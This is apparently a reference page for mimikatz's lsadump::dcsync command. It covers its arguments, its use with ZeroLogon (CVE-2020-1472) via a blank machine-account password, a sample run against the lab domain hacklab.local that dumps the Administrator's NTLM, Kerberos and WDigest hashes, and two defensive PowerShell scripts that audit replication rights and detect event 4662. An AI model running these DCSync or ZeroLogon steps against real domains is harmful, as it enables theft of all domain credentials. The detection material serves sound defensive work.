dcsync
lsadump::dcsync performs a DCSync and retrieves domain secrets. The command uses the Directory Replication Service Remote protocol (MS-DRSR) to ask a domain controller to replicate a specified directory entry, i.e. the same protocol domain controllers use to replicate with each other, so no code runs on the DC itself. The caller needs the Replicating Directory Changes and Replicating Directory Changes All extended rights on the domain naming context; by default these are held by Administrators, Domain Admins, Enterprise Admins and Domain Controllers, which is why any additional principal holding them is worth investigating. It has the following command line arguments:
  • /all: DCSync every object in the Active Directory database
  • /user: sync only the specified account (by sAMAccountName, with or without the domain prefix)
  • /export: save the retrieved secrets to files
  • /csv: print the output in CSV form
  • /dc or /kdc: the domain controller to connect to for replication
  • /guid: the objectGUID of the object to sync, as an alternative to /user. It can be obtained with net::trust, or read from the object's objectGUID attribute over LDAP.
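Because DCSync needs the replication extended rights described above, the first thing to check on a domain is who holds them. The following PowerShell is an added example, not code from the original page; it assumes the RSAT ActiveDirectory module (which provides the AD: drive) and a domain-joined host, and the GUIDs are the well-known rightsGuid values of the three replication control access rights.

```powershell
# Added example (not from the original page): list every ACE on the domain
# naming context that grants the extended rights DCSync depends on.
# Assumes the RSAT ActiveDirectory module; any domain user can read this ACL.
Import-Module ActiveDirectory

# Well-known control access right GUIDs (rightsGuid values in the schema).
$replicationRights = @{
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes'
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes-All'
    '89e95b76-444d-4c62-991a-0facbeda640c' = 'DS-Replication-Get-Changes-In-Filtered-Set'
}
# An ExtendedRight ACE with an empty ObjectType grants every extended right.
$allExtendedRights = '00000000-0000-0000-0000-000000000000'

$domainDN = (Get-ADDomain).DistinguishedName
$acl = Get-Acl -Path "AD:\$domainDN"

$acl.Access |
    Where-Object { $_.AccessControlType -eq 'Allow' } |
    ForEach-Object {
        $ace    = $_
        $guid   = $ace.ObjectType.ToString()
        $rights = [string]$ace.ActiveDirectoryRights
        $reason = $null

        if ($rights -match 'GenericAll') {
            $reason = 'GenericAll (implies all extended rights)'
        } elseif ($rights -match 'ExtendedRight') {
            if ($replicationRights.ContainsKey($guid)) { $reason = $replicationRights[$guid] }
            elseif ($guid -eq $allExtendedRights)      { $reason = 'All extended rights' }
        }

        if ($reason) {
            [pscustomobject]@{
                Identity    = $ace.IdentityReference.Value
                Grants      = $reason
                IsInherited = $ace.IsInherited
            }
        }
    } | Sort-Object Identity | Format-Table -AutoSize
```

Anything beyond the built-in Administrators, Domain Admins, Enterprise Admins, Domain Controllers and Enterprise Domain Controllers groups (and, where Azure AD Connect with password hash sync is deployed, its MSOL_ service account) should be explained. Also review WriteDacl and WriteOwner on the domain object: a principal holding either can grant itself these rights and then DCSync.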
The following command line arguments of lsadump::dcsync can be used for ZeroLogon (CVE-2020-1472) exploitation, where the domain controller's machine account password has first been reset to an empty value and the sync is then authenticated as that machine account:
  • /authuser: the domain controller's machine account (the computer name followed by $)
  • /authdomain: the NetBIOS name of the domain
  • /authpassword: must be set to blank ("")
  • /authntlm: use NTLM authentication
Note that resetting the machine account password breaks the DC's own Kerberos and replication until the original password is restored, so this is a destructive path.
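DCSync from a non-DC leaves a trace on the domain controller: Security event 4662 with the replication control access right GUIDs in its Properties field. The following PowerShell is an added example, not code from the original page; it assumes the RSAT ActiveDirectory module and that Directory Service Access (success) auditing is enabled on the DC, and it reports replication requests not made by a DC machine account.

```powershell
# Added example (not from the original page): on a domain controller, pull the
# last 24 hours of Security 4662 events whose Properties reference a replication
# control access right, and report those not requested by a DC machine account.
# Assumes the RSAT ActiveDirectory module and "Audit Directory Service Access"
# (success) enabled, which is what makes DCs log 4662 for replication requests.
Import-Module ActiveDirectory

$replicationRights = @{
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes'
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes-All'
    '89e95b76-444d-4c62-991a-0facbeda640c' = 'DS-Replication-Get-Changes-In-Filtered-Set'
}
# Machine accounts of legitimate replication partners, e.g. DC$ for DC.hacklab.local.
$dcAccounts = Get-ADDomainController -Filter * | ForEach-Object { "$($_.Name)`$" }

$events = Get-WinEvent -FilterHashtable @{
    LogName   = 'Security'
    Id        = 4662
    StartTime = (Get-Date).AddHours(-24)
} -ErrorAction SilentlyContinue

foreach ($event in $events) {
    # Flatten the EventData <Data Name="..."> elements into a hashtable.
    $xml  = [xml]$event.ToXml()
    $data = @{}
    foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }

    # Properties holds the access mask plus the GUIDs of the rights exercised.
    $hits = $replicationRights.Keys | Where-Object { $data['Properties'] -match $_ }
    if (-not $hits) { continue }

    $user = $data['SubjectUserName']
    if ($dcAccounts -contains $user) { continue }   # normal DC-to-DC replication

    [pscustomobject]@{
        Time   = $event.TimeCreated
        User   = "$($data['SubjectDomainName'])\$user"
        Rights = ($hits | ForEach-Object { $replicationRights[$_] }) -join ', '
        Object = $data['ObjectName']
    }
}
```

Caveat for the ZeroLogon case above: the sync is authenticated as the DC's own machine account, so this filter alone will not flag it. Pair it with event 4742 (a computer account was changed) on the DC's account, which the password reset produces, and with events 5827/5828/5829 that patched DCs log for vulnerable Netlogon connections.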
mimikatz # lsadump::dcsync /domain:hacklab.local /user:hacklab\Administrator
[DC] 'hacklab.local' will be the domain
[DC] 'DC.hacklab.local' will be the DC server
[DC] 'hacklab\Administrator' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)

Object RDN : Administrator

** SAM ACCOUNT **

SAM Username : Administrator
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00000200 ( NORMAL_ACCOUNT )
Account expiration : 01/01/1601 01:00:00
Password last change : 24/09/2021 16:24:41
Object Security ID : S-1-5-21-2725560159-1428537199-2260736313-500
Object Relative ID : 500

Credentials:
Hash NTLM: b09a14d2d325026f8986d4a874fbcbc7
ntlm- 0: b09a14d2d325026f8986d4a874fbcbc7
ntlm- 1: a06b19f88e0432e937a67fb6848e56bd
lm - 0: b28dd7b27e8cf0d2293087d70fc35769

Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : a367950918bb2ccabb50ab88e8ffb09f

* Primary:Kerberos-Newer-Keys *
Default Salt : HACKLAB.LOCALAdministrator
Default Iterations : 4096
Credentials
aes256_hmac (4096) : 0c1230dca827b75e872b5e5601eb6b76016412b4dd96b4aeb99a59a43490182c
aes128_hmac (4096) : e52cb5008be21bfe2e8429c74659d925
des_cbc_md5 (4096) : 4f45e3a7cd34bc83

* Primary:Kerberos *
Default Salt : HACKLAB.LOCALAdministrator
Credentials
des_cbc_md5 : 4f45e3a7cd34bc83

* Packages *
NTLM-Strong-NTOWF

* Primary:WDigest *
01 6ca5712f90260e1eb3abd67598e6750a
02 8dffe5b3aefb6e5ae29e628d2ee96a45
03 17be46dc199faf9b0bbda5bad36e3d6e
04 6ca5712f90260e1eb3abd67598e6750a
05 6fc635e3af189352029ce83a2219fa3c
06 510782016677b838b585d4f04d23f98a
07 b358628b75f049cf9e78f5e49bc560a2
08 c40c4076a86fbf852da4cb4bfa721d74
09 bf6734b4833bd61834c48fa6533acb9a
10 3c148f6edbc99e9a489d72fb809ee66b
11 0a100f8d2212e336adf8c429722d3a8c
12 c40c4076a86fbf852da4cb4bfa721d74
13 e649568c12076eba2026544142dc74fd
14 3ef797336ba53aaf034774a4fe8b06dc
15 797740715ee8fa059260c583fef36d5e
16 84aa405aaf242960160143fa357a3c7f
17 bb9ea6391483fa61fba5dced60ea039c
18 3871d21dfa14ede3c56b04ffc5970b1c
19 8e7946ea6e13210cb3ded49e2ff501fa
20 7480b0f8878e31ee2dcf3507fc2dbf54
21 2f7b7c9a2ac171f4417a38a52ef89989
22 3483e4a4ca60cd4b3d0bc66dc900f175
23 e1fa4a98cdab50c99934120090885d90
24 e16cb6277ed064c290498037f5dfe5b3
25 d6b096727b0d7a39cae06afd874247a9
26 f7a5f95bb7f0d0be1d8fe247b875cb29
27 e781f3584bf099e0a485657e832c6e74
28 acb55c0b8828a6660b166fc649708c1c
29 8fd36767c074ca738a81d5c7298295c3
When running lsadump::dcsync from a domain-joined host (here directly on the domain controller), the /user value does not need the domain prefix; the domain can be passed separately with /domain:
mimikatz # lsadump::dcsync /user:Administrator /domain:hacklab.local